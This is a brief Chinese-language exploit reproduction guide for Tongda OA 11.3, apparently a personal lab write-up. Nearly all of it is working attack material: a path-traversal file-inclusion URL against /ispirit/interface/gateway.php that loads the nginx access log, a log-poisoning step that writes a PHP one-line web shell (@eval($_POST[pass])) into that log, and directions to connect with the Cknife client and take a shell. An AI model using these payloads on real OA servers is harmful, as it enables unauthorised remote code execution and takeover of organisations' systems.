准备漏洞环境:
我使用的是从官网下载的最新版
本机:Windows10+Cknife 连接 shell
漏洞环境:通达 OA11.3 版服务端(2020-01-03 12:50)
开始复现
1、开始安装环境,一步步的傻瓜式安装,然后启动环境
2、然后拿出我们的 POC
/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.acces s.log
3、我们需要二步操作第一步:打开
第一步:打开
youdomain+/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/ oa.access.log,看能否显示出来日志
成功为此
第二步: 抓包写一句话, POC : youdomain+/ispirit/interface/gateway.php?<?php @eval($_POST[pass]);?>(gateway.php?之后的一句话可任意写入替换),成功即为下图
4、连接一句话,拿下 shell
(shell 默 认 地 址 : youdomain+/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/ oa.access.log)